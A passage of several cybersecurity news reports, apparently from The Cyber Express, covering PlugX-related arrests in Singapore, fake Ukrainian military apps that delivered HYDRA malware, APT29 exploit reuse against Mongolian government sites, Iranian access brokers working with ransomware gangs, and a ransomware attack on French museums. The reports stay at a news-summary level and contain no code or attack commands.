Cyble tell The Cyber Express. In a hypothetical scenario, threat actors could send a phishing email containing a malicious attachment that, once opened, installs PlugX on the victim’s system. This would allow the threat actor to gain unauthorized access to the victim’s machine, exfiltrate sensitive data, and maintain persistence for prolonged periods undetected, Cyble researchers said. One of the most recent campaigns from APT31 – a threat actor last seen using PlugX RAT in March – saw six Australian members of parliament being targeted to gather intelligence on them. The hackers used pixel tracking emails from a domain pretending to be a news outlet to target the MPs. If opened, these emails tracked the recipients’ online behavior. According to an earlier FBI indictment, the APT31 hackers spammed various government individuals worldwide associated with IPAC, with more than 10,000 malicious emails that also exploited zero-days and resulted in potential compromise of economic plans, intellectual property and trade secrets. The Singapore Police Force, however, did not link the arrested individuals to any threat group and details on this remain unclear. Facing the Full Force of the Law The five Chinese nationals arrested in Singapore are set to face charges under Singapore’s Computer Misuse Act 1993. If found guilty, they could face severe penalties, including imprisonment and hefty fines. The most common charges include unauthorized access to computer systems, possession of hacking tools, and the illicit handling of personal data. The Computer Misuse Act enforces strict measures against cybercrime, with penalties ranging from fines of up to $10,000 to imprisonment for up to three years, or both. The Singaporean man, charged with abetting these crimes, faces similar consequences under the same law.

Cyberwarfare just got a new battlefield: the Ukrainian army’s pockets! As Kyiv and Moscow engage in renewed hostilities and fire dozens of missiles every day across the border, the cyber realm is heating up too. Attackers posing as legitimate sources lured Ukrainian military personnel into downloading malware-laden fake military apps, aiming to steal authentication credentials and GPS coordinates from soldiers’ phones—a move that could have endangered lives on the battlefield. The Ukrainian Computer Emergency Response Team (CERT-UA), in collaboration with key military units, identified and neutralized two cyberattacks designed to infiltrate mobile devices of military servicemen. The attackers distributed fraudulent links disguised as legitimate apps for critical military systems, including the AI-based GRISELDA system and the military tracking system known as “Eyes.” Weaponized Apps as Attack Vectors Hackers have evolved, shifting from targeting networks to exploiting the very devices soldiers carry. In this case, attackers used Signal, a secure end-to-end encrypted messaging app, to distribute links mimicking the official websites of Ukrainian military systems. Once clicked, these links triggered downloads of malware, posing as mobile applications for GRISELDA and Eyes. GRISELDA is an artificial intelligence-based system for information processing which the Ukraine uses to process battlefield information at lightning speed. The malicious link in this case led users to a fake website offering a supposed mobile version of the GRISELDA app, which in reality does not exist. What soldiers actually downloaded was HYDRA—a backdoor malware designed to steal data and remotely access the infected device. The malware could exfiltrate everything from authentication tokens to keystrokes. The Fake GRISELDA website and mobile application (Source: CERT-UA) Meanwhile, the Eyes system, a tool used for military tracking, became another target. Hackers modified its legitimate software, embedding malicious code capable of stealing login credentials and device GPS coordinates. This added another layer of danger—GPS location tracking could be used to identify and target soldiers in real time. Why Mobile Devices Are Key Targets Mobile devices are central to modern warfare, enabling soldiers to communicate and access mission-critical systems. State hackers recognize this and are focusing their attacks on smartphones, knowing that compromising a device can give them access to far more sensitive military information. These devices are often used for accessing specialized military systems, which makes them a prime target for cyber espionage. Stealing GPS data or login credentials from these devices could allow attackers to track troop movements or even intercept classified communications. In a battlefield scenario, this could lead to devastating consequences, putting soldiers’ lives directly at risk. Coordinated Response Mitigates Threats CERT-UA worked closely with military unit A0334 and a joint response team from the Ministry of Defense and Armed Forces to investigate the cyberattacks. Their prompt identification and analysis of the attacks significantly reduced the probability of any long-term damage. They also enlisted the help of the private sector, including Google Cloud and Cloudflare, in neutralizing the cyber threats. The ability to detect and respond to cyberattacks in real time was critical. CERT-UA and its partners moved swiftly, keeping the potential consequences of the attacks to a minimum. The Role of AI and Malware in Cyberwarfare The AI-powered GRISELDA system was a key target for hackers. AI systems like GRISELDA help military units process vast amounts of data quickly, making them essential tools in modern combat scenarios. But the same features that make these systems valuable also make them highly attractive targets for attackers. In this case, the HYDRA backdoor malware served as the attack tool of choice. Once installed, HYDRA granted attackers access to session data, keystrokes, and more. The malware even allowed for the capture of HTTP cookies—small pieces of data used to maintain authentication between a user and a website—further exposing sensitive military data to theft. For the Eyes tracking system, the attack was more subtle. Hackers modified the legitimate program by embedding a third-party Java class that enabled the app to steal GPS coordinates and login information. This small change could have been catastrophic had it gone undetected, potentially giving adversaries insight into troop movements. Strengthening Mobile Device Security The incident showcases the critical importance of mobile device security for military personnel. Soldiers rely on their phones for everything from communication to navigation, and even a single compromised device could lead to disastrous consequences. To combat this, militaries must adopt comprehensive security measures tailored to mobile devices. This includes regular software updates, use of encryption, and restricting the installation of apps to trusted sources only. CERT-UA’s swift response is a strong example of the need for real-time detection and rapid action when a cyber threat is identified. Military units should also be vigilant about phishing attacks, as this incident shows how social engineering tactics can be used to trick personnel into installing malware. By distributing malicious links through Signal, a commonly trusted secure messenger, the attackers played on the trust soldiers have in their communication tools. Cyber Defense Lessons from Ukraine Ukraine’s experience in countering these cyberattacks offers valuable lessons for other nations and their military organizations. Close cooperation between military cybersecurity teams, cloud infrastructure providers like Google Cloud, and private sector cybersecurity specialists proved to be an effective defense mechanism. This partnership ensured the timely mitigation of cyber threats and the safeguarding of sensitive military systems. As warfare increasingly moves into the digital realm, military units worldwide must bolster their cybersecurity capabilities. The threat landscape is evolving rapidly, and cyberattacks targeting mobile devices are becoming more sophisticated. Nations can no longer afford to treat cybersecurity as an afterthought. The threat is real—and it’s in the palm of your hand.

Google has identified a connection between Russian state hackers and exploits that bear an “identical or strikingly similar” resemblance to those created by spyware companies NSO Group and Intellexa, raising concerns about the spread of commercial spyware into the hands of state-backed threat actors. In a blog post, Google revealed its discovery of these exploits, but admitted uncertainty about how the Russian government acquired them. This incident, according to Google, illustrates the risks when spyware developed by private companies falls into the hands of highly “dangerous threat actors.” The hackers, known as APT29, have been linked to Russia’s Foreign Intelligence Service (SVR). This group has a well-documented history of conducting cyber-espionage and data theft operations against high-profile targets, including tech companies like Microsoft and SolarWinds, as well as various government entities. Watering Hole Attacks on iPhones, Android Devices Google’s investigation found that the malicious code had been planted on Mongolian government websites from November 2023 to July 2024. During this period, visitors to these sites using iPhones or Android devices could have had their devices compromised and personal data, such as passwords, stolen in a type of attack known as a “watering hole.” Watering hole attacks are a tactic where attackers compromise legitimate websites to infect site visitors. The attackers exploited vulnerabilities in the Safari browser on iPhones and Google Chrome on Android—both of which had been patched before the Russian campaign began. However, devices that hadn’t been updated remained vulnerable. The iPhone exploit was particularly concerning, as it was designed to capture cookies from Safari, specifically targeting accounts hosted by online email providers used by Mongolian government officials. With access to these cookies, attackers could potentially infiltrate these accounts. Similarly, the attack on Android devices employed two separate exploits to extract cookies stored in the Chrome browser. Brief Overview of the Mongolian Campaign The watering hole attacks compromised the Mongolian government websites cabinet[.]gov[.]mn and mfa[.]gov[.]mn. These sites loaded a hidden iframe from attacker-controlled domains. The campaigns targeted: iOS Users between November 2023 & February 2024: A WebKit exploit (CVE-2023-41993) affecting devices running iOS versions older than 16.6.1. This exploit delivered a cookie stealer framework observed by TAG in a suspected APT29 campaign in 2021. The targeted websites included webmail services and social media platforms. Android Users with Google Chrome (July 2024): A Chrome exploit chain targeting vulnerabilities CVE-2024-5274 and CVE-2024-4671. This chain included a sandbox escape exploit to bypass Chrome’s Site Isolation protection, allowing attackers to steal a broader range of data beyond cookies. Exploit Similarities The iOS exploit used in the watering hole attacks mirrored one used by Intellexa in September 2023. Both exploits shared the same trigger code and exploitation framework, suggesting a potential common source. Additionally, the Chrome exploit chain incorporated techniques similar to those observed in a sandbox escape exploit used by Intellexa in 2021. ‘Strikingly Similar’ Spyware Exploits a Mystery Clement Lecigne, the Google security researcher who authored the blog post, explained that while the exact targets of the Russian hackers are not fully known, the location of the exploit and typical visitors suggest that Mongolian government employees were likely in the crosshairs. Lecigne, a member of Google’s Threat Analysis Group, which specializes in investigating state-sponsored cyber threats, pointed out that the exploit code reuse points to Russian involvement. The same cookie-stealing code was observed in a previous campaign by APT29 in 2021. The mystery behind how Russian hackers initially gained access to the exploit code remains unresolved, however. Google reported that the code used in both Mongolian attacks closely matched the exploits developed by NSO Group and Intellexa, companies recognized for creating spyware capable of breaching even fully updated iPhones and Android devices. Google emphasized that the Android exploit shared a “very similar trigger” with one from NSO Group, while the iPhone exploit used “the exact same trigger” as one from Intellexa, strongly suggesting a link between the exploit authors or providers and the Russian hackers. ‘NSO Does Not Sell to Russia’ While the claims from Google shows an overlap of exploits and potential links between Russia and private spyware vendors, the NSO Group has denied these links. Gil Lainer, Vice President for Global Communications at NSO Group, told The Cyber Express, “NSO does not sell its products to Russia.” “Our technologies are sold exclusively to vetted US and Israel-allied intelligence and law enforcement agencies. Our systems and technologies are highly secure and are continuously monitored to detect and neutralize external threats.” Both the U.S. and Israel have previously investigated NSO group’s clientele and kept a close eye on it.

A shadowy group of Iranian cyber actors is acting as access brokers for ransomware gangs and collaborating with affiliates to target the U.S. and its allies, exploiting vulnerabilities across sectors ranging from healthcare to local government. The FBI, CISA, and the Department of Defense Cyber Crime Center (DC3) warned today that these actors, believed to be state-sponsored, are focusing aggressively on access brokering and enabling ransomware attacks. ‘Pioneer Kitten’ Targets Critical Sectors These Iranian state-backed cyber operatives, tracked under a number of aliases such as “Pioneer Kitten,” “Fox Kitten” and “Lemon Sandstorm,” started as early as 2017 and have intensified their activities through August 2024. These threat actors have been leveraging their access to critical U.S. infrastructure to collaborate with ransomware groups, creating a nexus of threats. The group’s focus spans across multiple critical U.S. industries, including education, finance, healthcare, and defense, as well as government entities. These cyber actors are not only breaching networks but are also selling access to ransomware affiliates, such as NoEscape and BlackCat (also known as ALPHV), enabling these groups to execute ransomware attacks more effectively. The partnership between the Iranian actors and ransomware groups goes beyond mere access sales; they actively strategize to lock networks and maximize ransom payouts. State-Sponsored Freelance Operatives? While the FBI assesses that these actors are associated with the Government of Iran (GOI), their activities appear to operate on two fronts. On one hand, they conduct state-sponsored operations, particularly targeting Israel, Azerbaijan, and the UAE, to steal sensitive technical data. On the other, they engage in ransomware-enabling activities that seem unsanctioned by the Iranian government, raising questions about the true extent of their independence. Microsoft also reported on an Iranian threat actor today – “Peach Sandstorm” – that is targeting satellite, communications, energy and government sectors in the U.S. and UAE, with espionage activities more expected of state threat actors. Access Brokers for Ransomware Affiliates Among Tactics The collaboration between these Iranian actors and ransomware groups is a significant development in the way in which state-sponsored actors work. They offer their partners full domain control and domain admin credentials, making it easier for ransomware groups to deploy their attacks. The affiliates, in turn, reward them with a cut of the ransom, which the Iranian actors receive in cryptocurrency—a method that further complicates tracking their activities. Historically, these actors focused on gaining access to networks and selling that access on underground marketplaces. Now, they’re taking a more hands-on approach. This collaboration isn’t just about selling access; these actors are now deeply involved in executing the ransomware attacks themselves, locking down networks and negotiating with victims. Exploiting Vulnerabilities These Iranian actors have been known to exploit a range of vulnerabilities in widely-used networking devices. For example, they have targeted Citrix Netscaler (CVE-2019-19781 and CVE-2023-3519), F5 BIG-IP (CVE-2022-1388), Pulse Secure/Ivanti VPNs (CVE-2024-21887) and the latest being Palo Alto Networks’ PAN-OS (CVE-2024-3400). Palo Alto had in April revealed this RCE bug as actively exploited. The threat actor use these vulnerabilities to gain initial access, often scanning IP addresses with tools like Shodan to identify exploitable devices. Once inside, they utilize web shells, deploy backdoors, and create malicious scheduled tasks to maintain persistence. They also repurpose compromised credentials to escalate privileges within the victim’s network, making their operations difficult to detect and stop. They’ve even been observed disabling security software and using legitimate tools like AnyDesk for remote access, making it harder for defenders to spot malicious activity. Hack-and-Leak Campaigns These Iranian actors have also been involved in hack-and-leak operations, such as the Pay2Key campaign in late 2020, which targeted Israel. They stole data and leaked it on the dark web to undermine Israel’s cyber infrastructure. Unlike typical ransomware campaigns, these operations are aimed more at causing political and social disruption than financial gain. Iranian Threat Mitigations and Recommendations To counter these threats, the FBI and CISA recommend that organizations review their logs for any traffic associated with known malicious IP addresses, apply patches to vulnerabilities like CVE-2024-3400, and check for unique identifiers linked to these actors. Regularly validating security controls against behaviors mapped to the MITRE ATT&CK framework is also advised. The increasing sophistication and collaboration between Iranian cyber actors and ransomware groups calls for heightened vigilance across all sectors, particularly those critical to national security. As these actors continue to evolve, the line between cybercrime and state-sponsored espionage blurs further. Staying vigilant is an imperative, as the consequences of these attacks go beyond financial loss—they strike at the heart of national security.

A ransomware attack crippled the IT systems of France’s national museum network on Sunday, the Paris prosecutor’s office said. The cybercrime unit of the French police has launched an investigation into the breach, which affected approximately 40 museums as cyberattacks targeted at the Paris Olympics have surged. Among the impacted institutions is the Grand Palais, a prominent Paris museum and exhibition hall temporarily converted into a sports venue for the ongoing Paris 2024 Summer Olympics, hosting fencing and taekwondo competitions. The attackers have reportedly encrypted some of the financial data and are threatening to release it unless an undisclosed ransom amount is paid. Despite the cyberattack, the prosecutor’s office confirmed that Olympic operations remain unaffected. France Sees Cyberattacks Surge Amid Paris Olympics 2024 The incident is the latest in a string of cyberattacks targeting France during the Olympic Games. Outgoing Prime Minister Gabriel Attal disclosed last week that authorities thwarted 68 cyberattacks in the Olympics’ opening days, with two aimed at Olympic facilities at Bercy and La Villette. “All these 68 cyberattacks, including the two cyberattacks that targeted Olympic sites, were detected in time and foiled,” Attal said. Beyond the digital realm, France’s critical infrastructure has also come under pressure. While coordinated arson attacks disrupted the country’s rail network on the opening ceremony day, a major sabotage operation targeted the fiber network a few days later. Both incidents are under investigation. France Prepared for Olympic Cyberattacks France’s cybersecurity agency, ANSSI, had anticipated a surge in cyber threats leading up to the Olympics and spent the past two years bolstering defenses through penetration testing and public awareness campaigns. “Our goal isn’t to completely block attacks during the Olympics,” ANSSI Director Vincent Strubel had said in April. “It’s to significantly reduce their impact by enhancing security.” Just ahead of the Games, French authorities launched a major operation to clean up computers infected by a cyber espionage program that has struck millions of users worldwide. The scale of cyber threats facing the Olympics is immense. Cisco, which officially oversees the cybersecurity and network security of Olympic games, said the previous Olympics held in Tokyo saw 450 million cyberattacks, most of which were attempts to paralyze IT networks by overwhelming them. The head of technology for Paris 2024 said he anticipated “eight times more” cyberattacks than Japan had experienced.